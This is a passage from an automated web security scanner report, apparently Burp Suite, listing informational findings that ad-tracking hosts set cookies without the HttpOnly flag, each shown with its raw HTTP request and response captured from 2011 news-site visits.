Cookie: digtriadprod=R4278572220; rsi_segs=D08734_70008|D08734_72078; GCIONSN=AAAAOn52dzoxfnVidDox; s_cc=true; s_sq=%5B%5BB%5D%5D; gban=inter%3Ddisabled%3Atrue%2Cviews%3A1%2Cexpiry%3A16H%2Cplacementid%3A1273145%2Cpreload%3Afalse%2Cid%3Ainter%2Ccontrolurl%3Ahttp%253A//gannett.gcion.com/addyn/3.0/5111.1/1273144/0/0/ADTECH%253Balias%253Dfl-brevard.flatoday.com/news/article.htm_Interstitial%253Bcookie%253Dinfo%253Bloc%253D100%253Btarget%253D_blank%253Bgrp%253D24711%253Bmisc%253D1304949586599%253Bsize%253D0%253Bnoperf%253D1%2Cexpires%3A1305007188

Response

HTTP/1.1 200 OK
Set-Cookie: digtriadprod=R4278572220; path=/
Cache-Control: public, max-age=86320
Content-Length: 68778
Content-Type: text/javascript; charset=utf-8
Expires: Tue, 10 May 2011 08:22:28 GMT
Last-Modified: Mon, 09 May 2011 08:22:28 GMT
ETag: -1678712871
Vary: Host
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: l3vm210l3pluckcom
Date: Mon, 09 May 2011 14:00:33 GMT

...
var PluckSDK=(function(){var extend=function(obj,options){for(var v in options){obj[v]=options[v];}
return obj;};function instance(obj,constructor,objectType,options){if(!(obj instanceof construct
...[SNIP]...
10.117. http://sync.mathtag.com/sync/img  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sync.mathtag.com
Path:   /sync/img

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sync/img?mt_exid=11&type=sync&redir=http%3A%2F%2Fbh.contextweb.com%2Fbh%2Frtset%3Fdo%3Dadd%26pid%3D530739%26ev%3D%5BMM_UUID%5D HTTP/1.1
Host: sync.mathtag.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; mt_mop=4:1304791875; ts=1304791878

Response

HTTP/1.1 302 Found
Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7850 30800
Cache-Control: no-cache
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Date: Mon, 09 May 2011 14:00:07 GMT
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=530739&ev=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Etag: 4dab7d35-b1d2-915a-d3c0-9d57f9c66b07
Connection: Keep-Alive
Set-Cookie: ts=1304949607; domain=.mathtag.com; path=/; expires=Tue, 08-May-2012 14:00:07 GMT
Content-Length: 0

10.118. http://syndication.mmismm.com/tntwo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /tntwo.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tntwo.php?mm_pub=7333&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&r=&t=300 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=gannett%3Afloridatoday
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:46 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sun, 08-May-2016 20:00:46 GMT; path=/; domain=.mmismm.com
Content-Length: 62
Content-Type: text/javascript

var msegs='AG=1;AK=1;AM=1;AQ=1';Mindset.handleResponse(msegs);
10.119. http://t.invitemedia.com/track_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.invitemedia.com
Path:   /track_imp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /track_imp?partnerID=64&campID=60443&crID=86537&auctionID=13049496061384085-86537&cost=2.1000&pubICode=2250555&pub=321582&url=http%3A%2F%2Fwww%2Esurphace%2Ecom%2Fads%2Frubicon%5Forlandosentinel HTTP/1.1
Host: t.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?7DlEAJUeFQAKf3sAAAAAACSrHgAAAAAAAgAAAAQAAAAAAP8AAAACCtSXIQAAAAAAO1ciAAAAAABSbigAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACvfA0AAAAAAAIAAwAAAAAAPQrXo3A9.j.NzMzMzEwoQM3MzMzMzABAAAAAAAAAK0DNzMzMzMwAQAAAAAAAACtAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANvP6S5dcQCvvERZXEb1jB5Wo9UMMB68IBgYBOAAAAAA==,,http%3A%2F%2Fwww.surphace.com%2Fads%2Frubicon_orlandosentinel,Z%3D468x60%26s%3D1384085%26_salt%3D2430113711%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.surphace.com%252Fads%252Frubicon_orlandosentinel%26r%3D0,a481febc-7a44-11e0-9004-734ea9a602b1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJ7H7+DGglUCAcAECUP/o="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 14:00:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 13:59:53 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: subID="{}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"448473\": [1304949613+ \"5a084518-c653-31f6-9001-dfed53bc2d1c\"+ 22489+ 70760+ 139]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: camp_freq_p1="eJzjkuGYfYNZgFHi7bP571gUGDV65y94x2LAaAHmc4lwrDzLCpTt/N4GlGXQYDBgsGAAit47wCrAJLHlwq+3yKJXPrMA1a5HE30FFGWSeLboB4roivkgcyf3nUYR3Xkf5JZZ89ciRAEj8S6p"; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Set-Cookie: io_freq_p1="eJzjEuZY4CLAKPH22fx3LAaMFmCaS5jjagRQsPN72zsWBQYNBgMGCwag4HpXASaJLRd+vUUWPB4owCyxHk1wWyhQ++S+0yiCe0EWzZq/FiEIAES0Iic="; Domain=invitemedia.com; expires=Tue, 08-May-2012 14:00:13 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;
10.120. http://tacoda.at.atwola.com/rtx/r.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rtx/r.js?cmd=AAU:LCN&si=12177&pi=&xs=3&pu=http%253A//www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509%252C0%252C6839926.story%253Fifu%253D&df=1&v=5.5&cb=96391 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305161950|60130^1^1304972569|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946; TData=99999|^|51134|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|57094|50961|52841|51182|56419|54032|51186|56988|56673|56148|57362|56969|60203|56835|56987|56780|50220|56768|56299|56761|54057|56681; N=2:d324038c0b1792515a8a9f1affa44cde,d324038c0b1792515a8a9f1affa44cde; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:49 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 14:14:49 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 13:59:49 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305161950|60130^1^1305554389|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554389; path=/; expires=Mon, 16-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304949589^1304951389|12177^1304949589^1304951389; path=/; expires=Mon, 09-May-11 14:29:49 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|52841|51182|56419|56969|56148|57362|60203|56835|56987|56761|56681|50213|56780|56232|50220|56768; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:d324038c0b1792515a8a9f1affa44cde,00a1aa9458d8a100f3797a835d7de998; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY5Njk6NTYxNDg6NTczNjI6NjAyMDM6NTY4MzU6NTY5ODc6NTY3NjE6NTY2ODE=; expires=Thu, 03-May-12 13:59:49 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=x; path=/; expires=Tue, 10-May-11 13:59:49 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 321
Content-Type: application/x-javascript
Content-Length: 321

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16r4opq1tvlkml';
var ANSL='99999|^|51134|56281|50086|50085|53380|60490|60512|50963|52615|60491|50507|53656|55401|60509|54255|57094|54243|50961|54209|
...[SNIP]...
10.121. http://tag.contextweb.com/TagPublish/getad.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getad.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /TagPublish/getad.aspx?tagver=1&ca=VIEWAD&cp=536156&ct=101378&cf=728X90&cn=1&rq=1&dw=1066&cwu=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&mrnd=74482871&if=0&tl=1&pxy=0,0&cxy=1050,3575&dxy=1050,3575&tz=300&ln=en-US HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=3bZ_cGKSaikCutesUynzUXb59QbtOHa7Nv35a38qe_dW_2SdvoXWHsQ; pb_rtb_ev=1:535495.0c2aede6-6bb6-11e0-8fe6-0025900a8ffe.1|530739.4dab7d35-b1d2-915a-d3c0-9d57f9c66b07.0|535039.9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC.0|535461.2931142961646634775.1; cr=2|1|-8588966416881931568|1; FC1-WC=^53620_1_2QLwy; V=wOebwAz4UvVv; cwbh1=541%3B05%2F24%2F2011%3BLIFL1%0A1697%3B05%2F24%2F2011%3BFCRT1%0A2354%3B05%2F24%2F2011%3BZETC1%0A2532%3B05%2F26%2F2011%3BAMQU2%0A1443%3B05%2F30%2F2011%3BNETM7%0A2250%3B06%2F06%2F2011%3BEXPD1; cw=cw

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB23
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 2555
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 09 May 2011 14:00:02 GMT
Connection: close
Set-Cookie: V=wOebwAz4UvVv; domain=.contextweb.com; expires=Wed, 09-May-2012 14:00:02 GMT; path=/
Set-Cookie: 536156_4_101378=1304949602182; domain=.contextweb.com; path=/
Set-Cookie: cr=2|1|-8588966416881931568|1%0a15|1|-8588960524833886248|1; domain=.contextweb.com; expires=Thu, 03-May-2012 14:00:02 GMT; path=/
Set-Cookie: vf=1; domain=.contextweb.com; expires=Tue, 10-May-2011 04:00:00 GMT; path=/

var strCreative=''
+ '<script src="http://tag.admeld.com/passback/js/610/gannett/728x90/8/meld.js"></scr'+'ipt>\n'
;
document.write(strCreative);var strCreative=''
+ '<iframe src="http://bh.context
...[SNIP]...
10.122. http://tags.bluekai.com/site/2731  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/2731

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/2731 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; bklc=4dc7f363; bk=c6b/zCA+ZqtVIHOf; bkc=KJh56XLgHcWDOdeFpTpcKeup//DGhoYAEYCLwaRVN6RBYy+oBFq0S+u/uS0GiPnVck1LjZwOjYqI9yrk8OAnhRjRzzfkjIf8nVqhSzfld1b28lzpYMiL9v0w+mUYAY2ewM9XbL8b3xMT4aeyBj2q2O4REd7uQdHpZFwSFAJQKOlGZEbplcY8tYceIEcoNkJof3K5JC5kQcT02tKco3u8UoFp/ld7LSwaxcVBxCX2U0bbqR47/zh8fx6U1BzaEWqu5of2Ni72Sci2xlgB1w4Ud3qpOr/vkT7E4NKBu4Ktuaz6uJXWoYdXH7Tay70I2ig+bTltsU2w6qfnqnXS87g+9Q2yE4LvJNJt7g6yJH6Npc7+GOKTFNW/fV52S8Mg+Hm6FtxuSBpBrMLZp4USNuV6fl3aR7/m5CgRnyW/zflt1KU55JIt57fpfmPSSSfU73e8wrXPtg6orGdv5rOmrL8yW26FolBZox+7oJdcouFnoUAKqRFtXIPVbwcIpLzmBAwRd7fIfvc7lthEumT5d4FSnXllhV7mSIKHefRPWQ8ce14qLFqxIpF5CcOTDqGlvZlFN5cF0idfXlhmXlpSwTTe9eW=; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101DfI4ByU9WiUOgD=; bkst=KJh5Dn+v96WD7u/QZ1x/kAvyLcHC775ZyY/hgkWCCniSDLALL66QvznrigP4WvpLHHeaH+OYa1PcSI1lVBQ/agqmgANy3LB8z1b59g35HrT572bNYrMKTuADed3eRE3GoDImK7eD/Q3JJxyEbfWKiEyK23u7kzHKO901i9it9/lzddM7j8RvTBSE0CiwHNjTOCwy+ePVVRD8ReqIrceI+XkvDzkV4ek3eMsJ9EHkU9GiZ99Z2sfohLZPTAHimDI6i7ZYWb6GO0Goa09JOPUn8zBi5rnL6gweHyTF/Blof/4qqHsF6TtKUm7poO7xxW1z+jrMRnUhDfN0lCw77DKBrCdTgVTcIlsb8VdvDqycoob1ygPCwh2DnZU+Vu+EQ/ZZPY3lQ3Mh8fZE3tVWuiC+V8wVedCm6AlYfN4cF8KpJHJ9s1WaJ+H2/XjsH0WOjqMHRxuC4gZI5BbpZUXldyJRfc9I; bkdc=res

Response

HTTP/1.0 200 OK
Date: Mon, 09 May 2011 14:00:12 GMT
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Tue, 10 May 2011 14:00:12 GMT
Cache-Control: max-age=86400, private
Set-Cookie: bk=h3IyWOA+ZqtVIHOf; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh56XLgHaWzOdeF1K1hcL6LuvaHMYaJZRqYhZBkzVlDLnYxjZ1FgbQHWi+3GouNhhuntPQys4W4VYQkpNQGBLuvlIISRIfFnmfi6dN24I4zXpFUUy/1NuADfbSLcmpDIXZFxxQwrf1IDXOCOVO2oi6UO7pL9XBzgfNROcy2vFiSnihbO4jpF7xdwD8pU++UY90r9NtE88RqnCzfRMCduq3kPJgfSS4JHV59n87fL01E6k0Fp4ZCpcgLVecQgNqGGKdnHS4+bO0WmSI2TxJZmGehtqu5jfIlupXjUZIEUMw1dqPdSntIr1JPTFE4Puwulzlua4UuJ6co0TYHUTWygbI2uFBbol7swN/6fpnqqTS8UgF992pxFvvJkJN7p62/hyhpUMFAOH8raunfV5Xj87g+O16FZxxS1FKUlqAAp4UShtxllRI+7qXXKfksZrrNhti2gyKaPZIvfoK0cq0UgMUzuw4abjhobz/obj5Hbzo0S5bw+AU7dKNVbwnIfRX5SGvydE2AfvcdKpmLAByfIF5BxJg7fpE7+4w/O2LvYR57ez4eVUFGdWTl/Hh5Ambmu5+p5wufeLMIFeI7KUdSFt9b9oT=; expires=Sat, 05-Nov-2011 14:00:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=res; expires=Tue, 10-May-2011 14:00:12 GMT; path=/; domain=.bluekai.com
BK-Server: 9936
Content-Length: 62
Content-Type: image/gif
Connection: keep-alive

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;
10.123. http://tags.bluekai.com/site/3358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/3358

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/3358?id=wOebwAz4UvVv HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=exy99JnggW62duLG; bkou=KJhMRsOQRsq/pupQjp96B2Rp+eEV1p/66E101KjjLzXU9Wj/OQG=; bko=KJ0qh1q9XWFf3YXwyhNKOGSuZGmIE903zJRLcyweM5Dc4JDRJvWLxRRyxxRssd82FGy1BAYVvjMkpx+C1EWAxk71eaP9cuKUf9evsg1p1myeLyeSHO72; bkw5=KJhgDsHQRmY3jK9YDA/1XHG1e/y17aycoM1yLsACj/xjcrAMjwbOjuGj4QWoPGRWBTE1akt/eWQwaX1N/TE1vuxjqGSdue/KCiYjSGRExW3xTqRoxZRqAmlsVzkyQH6AjZzJ/Mw8ozDjsax+sOizmvLjNJQRsaQRXgN91+mRwyOPXaQOMVs9Z1ReRQJkdFw/Je90SYnJz1akoBxjsqEO1iPQsDSGeY4F5OBsO76AsuRDZDvxeB9aUhCORHOrMlYOk0lYcZTDKtfq/DhMHMcBeS0dsi3sg1z5namY/LwsVpmUASc5QRWCESvS/xDL2L/OTGv7xOKQ0ghWAMayQLxY09VzespminYm9zRi9tXkyy+ZAWdUr6cYZ3ZuQVWFAQypyt/AZVXK0vS5X6YRJr9BX7y5mJhasajT/Vx90ZoUfQ==; 